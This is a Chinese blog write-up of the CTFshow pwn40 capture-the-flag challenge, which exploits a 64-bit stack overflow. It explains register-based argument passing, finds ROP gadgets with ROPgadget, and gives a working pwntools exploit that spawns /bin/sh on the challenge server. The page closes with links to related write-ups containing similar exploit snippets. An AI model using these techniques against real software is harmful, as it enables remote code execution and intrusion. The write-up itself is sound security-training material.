CTFshow-PWN-栈溢出(pwn40)

最新推荐文章于 2025-05-23 21:01:57 发布
原创 最新推荐文章于 2025-05-23 21:01:57 发布 · 1.4k 阅读 · 23 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #c语言 #汇编 #学习 #linux

本文聚焦64位Linux系统,介绍了ROP攻击方法。分析64位程序与32位程序传参规则差异,利用ROPgadget工具获取rdi和ret地址,构建特定payload格式,将/bin/sh字符串地址放入rdi寄存器,调用system函数执行系统命令,最终成功拿到flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

64位的 system(); "/bin/sh"

检查:

64 位程序

拖进 ida64 分析:

前面讲过的基础这里就不再过多说明,主要差别就是这里是 64 位程序

确定到栈底的距离:0xA

 /bin/sh 字符串的地址:0x400808

system 函数的地址:0x400520

对于 32 位程序来说这些已经够了,但是这里是 64 位程序

首先我们需要知道 64 位程序与 32 位程序传参规则的不同:

在 32 位汇编中,参数是直接放在堆栈上的,而不是放在寄存器上。

但是对于 64 位汇编,当参数少于等于 6 个时,参数从左到右依次放入寄存器:rdi、rsi、rdx、rcx、r8、r9。当参数为 7 个以上时,前 6 个参数仍然按照上述规则放入寄存器,但是第 7 个及以后的参数从右向左依次放入栈中。也就是说要先把六个寄存器放满了才会考虑放入栈。

有的题,里面既没有现成的 system 函数,也没有 /bin/sh 字符串,也没有提供 libc.so 给我们,那么我们要做的就是想办法泄露 libc 地址,拿到 system 函数和 /bin/sh 字符串,我们就需要获取 rdi, rsi, rdx, rcx, r8, r9 它们的地址,首先要获取的是 rdi 的地址。

rdi 的地址我们使用工具 ROPgadget 来获取:

ROPgadget --binary pwn --only "pop|ret" | grep rdi

参数解释:
--binary pwn: 指定了要分析的二进制文件的文件名。
--only "pop|ret": 指定了只查找包含"pop"和"ret"指令序列的代码片段,这些指令通常用于弹出寄存器中的值,并将控制流返回到调用函数的地址处,是ROP攻击中常用的gadgets。
| grep rdi: 将ROPgadget的输出传递给grep命令,然后使用grep命令筛选出包含"rdi"寄存器的代码片段,这样就可以只找到包含"pop|ret"指令序列并且弹出rdi寄存器的gadgets。

gadgets 指的是程序中的一些短小的代码片段,这些代码片段通常以一种特定的指令序列结尾,比如"ret"指令。(就是以 ret 结尾的指令序列)

找到 rdi 的地址:0x4007e3

接下来我们还需要获取 ret 的地址:

使用 ROPgadget 工具扫描二进制文件,提取其中的代码片段(gadgets),并识别其中有用的指令序列,比如 pop 和 ret 等。

ROPgadget --binary pwn

找到 ret 的地址:0x4004fe

payload 格式:

payload = b'a'*(0xA+8) + p64(pop_rdi) + p64(bin_sh)  + p64(ret) + p64(system)

0xA+8个填充字节(用'a'填充):用于填充到栈溢出的位置,达到返回地址的偏移。
pop_rdi:用于将下一个值弹出到rdi寄存器中。
bin_sh:需要执行的系统命令字符串的地址。
ret:用于绕过栈中的返回地址,返回到调用者。
system:系统函数system的地址,用于执行系统命令。

在这个顺序下,首先会使用 pop_rdi 指令将 bin_sh 的地址加载到 rdi 寄存器中,然后通过 ret 指令返回到调用者,从而间接地调用了 system 函数,实现了执行系统命令的目的。 

在64位的Linux系统中,参数传递是通过寄存器来完成的,而 system 函数的第一个参数(即需要执行的命令字符串)是通过 rdi 寄存器传递的,所以,我们首先需要将 /bin/sh 字符串的地址放入 rdi 寄存器中,然后才能调用system函数,这就是为什么我们需要知道 pop rdi ;ret 指令序列的地址,因为它会将栈顶的值弹出到 rdi 寄存器中,而 ret 指令的作用是用于绕过栈中的返回地址,通过 ret 指令返回到调用者,从而间接地调用 system 函数。

编写 exp:

from pwn import *
context.log_level = 'debug'
p = remote('pwn.challenge.ctf.show', 28286)
payload = b'a'*(0xA+8) + p64(0x4007e3) + p64(0x400808) + p64(0x4004fe) + p64(0x400520)
p.sendline(payload)
p.interactive()

命令执行 

拿到 flag:ctfshow{b07ab0bb-6d6c-425f-a49f-163e400a46a7}

CTFshow-PWN-栈溢出pwn65 详细版)
Welcome To Myon'Blog !
07-14 1261
摘要:该64位程序存在PIE保护,包含RWX段,通过read读取用户输入作为shellcode执行。程序会对输入字符进行严格检查,仅允许大小写字母、数字及部分符号(ASCII 48-90)。利用alpha3工具将原始shellcode编码为符合要求的ASCII字符,通过rax寄存器执行。最终成功获取flag:ctfshow{944db499-0c4a-4894-a0a5-3f7aeccec7de}。关键点包括字符过滤机制分析和alpha3编码技术的应用。
CTFshow-PWN-栈溢出pwn49)两种方法+动调分析
最新发布
Welcome To Myon'Blog !
06-09 1306
执行后,可以看到 0x80da000 往后部分为可读可写可执行权限。看似开了 canary 保护,实际没有,是 checksec 版本太老了,检测到 __stack_chk_fail 函数就算开了。看似和上一题一模一样,但是细心的小朋友应该注意到了,左边多出了很多函数,说明这个程序是静态链接的,静态链接就意味着没法去打 ret2libc了,还是无 system 无 /bin/sh,考虑打 ret2syscall。
CTFSHOW-PWN入门-栈溢出(35-42)
2402_84585385的博客
10-09 1027
发现hint函数中存在system函数,useful函数存在sh,根据题目的提示得知或许sh可以替代bin/sh,找到sh的地址为0x80487BA。发现hint函数中存在system函数,useful函数存在sh,根据题目的提示得知或许sh可以替代bin/sh,找到sh的地址为0x400872。ctfshow函数中的,v1大小为14,而read函数读取大小为50,所以read函数存在栈溢出,使用cyclic计算栈偏移量为22。ctfshow函数中的read函数存在栈溢出,cyclic计算栈偏移量为18。
ctfshow做题笔记—栈溢出pwn37~pwn40
Yilanchia的博客
02-06 787
32位的x86使用栈来传递参数,而64位的则大多使用寄存器传参,比如前六个整数或指针参数放在rdi、rsi、rdx、rcx、r8、r9,浮点数用xmm0到xmm7。我们ctrl+F12找/bin/sh的地址:.rodata:0000000000400808 00000008 C /bin/sh。所以这道题的思路就是利用buf制造栈溢出覆盖到函数返回地址,替换为system函数地址,再将/bin/sh的地址传入rdi。二、pwn38(64位的 system(“/bin/sh”) 后门函数给你)
简单的CTF pwn栈溢出 (超级超级详细)
2402_88130150的博客
05-23 923
思路:看主函数,没东西,只有func(),所以点击func()看此函数内容,发现注入点gets(),触发flag点,v2==11.281125。思路:进入main,注入点read()(限制16位字符),获取flag,backdoor()函数。思路:进入main函数,进入vulnerable_function()函数,发现注入点,read()(读入512个字符到buf),思路:点main,发现vuin(),进去看,发现注入点fget(),限制32字符,flag获得函数,边框中get_flag。
CTFshow-pwn入门-前置基础pwn29-pwn31
你们de4月天的博客
06-21 2044
CTFshow-pwn入门-前置基础pwn29-pwn31(绕过PIE-pwn31)
CTFshow-PWN-栈溢出pwn39)
Welcome To Myon'Blog !
04-24 2064
p32(bin_sh):这部分是 /bin/sh 字符串的地址,作为 system 函数的第一个参数,/bin/sh 是一个用于启动 shell 的路径,在利用缓冲区溢出漏洞时,我们可以使用这个参数来告诉 system 函数要执行的命令。p32(0):这部分是 system 函数的第二个参数,在大多数情况下,system 函数的第二个参数应该是一个指向空值的指针,表示没有额外的参数,这里使用了0,表示一个空指针。根据题目描述:32位的 system();/bin/sh 字符串的地址: 0x8048750。
ctfshow pwn
zip471642048的博客
06-04 642
ctfshow pwn系列
CTFshow——Pwn(1)
Y_peak的博客
02-24 492
CTFshow——Pwn(1) 有点懒不想写write up了。只有exploit。 PWN签到题 from pwn import * p = remote('xxx',xxx) p.interactive() pwn02 from pwn import * p =remote("pwn.chall.ctf.show",28006) p.sendline('a'*(0x9+4) + p32(0x0804850F)) p.interactive() pwn03 from pwn import * from
CTFshow-PWN入门-栈溢出pwn35~pwn40
weixin_63576152的博客
08-22 1628
本文主要详解CTFshowpwn入门系列的栈溢出模块的前6题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope参考文章:以下操作中小编用的都是自己的kali环境。
CTFshow-PWN入门-栈溢出38-40详解 持续更新
王慕杨。的博客
09-06 975
本来是不想写的,但是想想还是写一下吧,基础知识这些就先不写了,以后有时间再补上吧,比较懒前面的有时间再写吧 主要是做过了。。懒。
CTFshow-pwn入门-栈溢出pwn35-pwn36
你们de4月天的博客
06-21 1373
CTFshow-pwn入门-栈溢出pwn35-pwn36
【CTFWP】ctfshow-web40
LongL_GuYu的博客
07-30 1544
CTFWP:ctfshow-web40
CTFshow-pwn入门-前置基础pwn13-pwn19
你们de4月天的博客
06-17 2353
ctfshow pwn入门-前置基础pwn13-pwn19
CTFshow-pwn入门-栈溢出pwn39-pwn40
你们de4月天的博客
12-27 1348
CTFshow-pwn入门-栈溢出pwn39-pwn40
Ctfshow pwn 02(自己做出的第一道pwn题)
weixin_64875092的博客
12-05 5670
算是一篇第一次做出pwn题的日记了! 本文写给想要入门pwn但只安装好虚拟机和ida完全不知道怎么用的小白~ 有许多写的不严谨或无脑的地方请多包涵! 其中有许多我在做题时踩到的坑(因为自己零基础实在不知道怎么问也不知道去问谁而导致浪费好多时间而进行不下去) 现在开始! 首先第一步,来到ctfshow的网站,找到这道pwn02 之后点击Launch an instance(这所是一个建立连接的步骤,少了这一步在使用python3时会出现如下报错)如果问我什么是python3,请耐心看下去
CTFshow-PWN-栈溢出pwn36)
Welcome To Myon'Blog !
04-23 1260
每次调用 puts 函数时,它都会再次进入函数体内,然后又调用 puts 函数,这样就形成了无限递归调用。声明了一个长度为 36 字节的字符数组 s,调用 gets 函数,并将 s 数组作为参数传递给它,然后将 gets 函数的返回值作为 ctfshow 函数的返回值。这个特定的 puts 函数定义中,函数体内部再次调用了 puts 函数,并且传递了相同的参数 s。disass 是 GDB 的指令,这里是反汇编名为 get_flag 的函数。这里 s 数组存在栈溢出的可能,具体看后面的分析,
CTFshow-PWN-栈溢出pwn37-pwn38)
Welcome To Myon'Blog !
04-23 1895
当我们在堆栈中进行堆栈的操作的时候,一定要保证在 ret 这条指令之前,esp 指向的是我们压入栈中的地址,函数执行到 ret 执行之前,堆栈栈顶的地址 一定要是 call 指令的下一个地址。对于这种有后门函数的简单栈溢出我们就不作过多分析,这种类型题是有固定套路的,我们这里就直接用模版 exp 打通。因此我们还需要找一个地址: lev 的地址或者该函数结束的地址(即 retn 的地址)(注意这里的 /bin/sh 直接双击跟进的地址并不是后门函数的地址)跟进 ctfshow 函数,也是典型的栈溢出
ctfshow 基础pwn wp
n1ptune__的博客
05-29 827
PWN01 简单栈溢出,ret2text from pwn import * #p = process("./pwn1") p = remote(ip,port) p.recv() payload = 'a'*(0x9+4) + p32(0x0804850F) p.sendline(payload) p.interactive() PWN03 32为程序,栈溢出,无system,ret2libc,32位程序通过栈传参 from pwn import * from LibcSearcher import *
CTFSHOW-PWN入门 pwn5
01-10
### CTF SHOW PWN入门 pwn5 解法 对于CTF SHOW平台上的PWN挑战,尤其是针对`pwn5`这一题目,解决方法通常涉及对二进制漏洞的理解以及如何利用这些漏洞来获取flag。 #### 题目分析 在处理这类问题时,首先需要下载并理解目标程序的行为模式。通过逆向工程工具如IDA Pro或Ghidra可以查看可执行文件内部结构,识别潜在的安全缺陷[^1]。 #### 漏洞发现 经过初步审查后得知此题存在栈溢出的可能性。当输入长度超过缓冲区大小时未作适当检查便直接复制到固定空间内,这使得攻击者能够覆盖返回地址从而控制EIP寄存器指向任意位置执行恶意代码片段[^2]。 #### 利用技巧 为了成功完成该关卡,需构建特定格式的数据包作为输入发送给服务端进程。这里采用的方法是构造ROP链(Return-Oriented Programming Chain),即精心挑选一系列现有指令序列组合起来实现所需功能而不必注入额外shellcode: ```python from pwn import * context(os="linux", arch="amd64") binary_path = './path_to_binary' elf = ELF(binary_path) # 远程连接设置 host, port = "remote_host", 1234 conn = remote(host, int(port)) # 构造payload offset = ... # 计算偏移量 ret_address = ... pop_rdi_ret_gadget = ... payload = b'A' * offset + \ p64(pop_rdi_ret_gadget) + \ p64(target_function_arg) + \ p64(ret_address) conn.recvuntil(b'Tell me your name:') conn.sendline(payload) ``` 上述Python脚本展示了基本框架,实际应用中还需根据具体情况调整参数值,比如计算正确的偏移量(offset),找到合适的gadgets等[^3]。 #### 获取Flag 一旦成功触发了预期行为,则可以通过读取内存中的字符串或其他方式获得最终答案。例如,在某些情况下可能需要解析动态链接库表项以定位标准I/O函数的实际映射地址,进而打印出隐藏信息;而在另一些场景下则可能是直接调用了puts()之类的API输出预设好的标志位[^4]。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

My6n

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值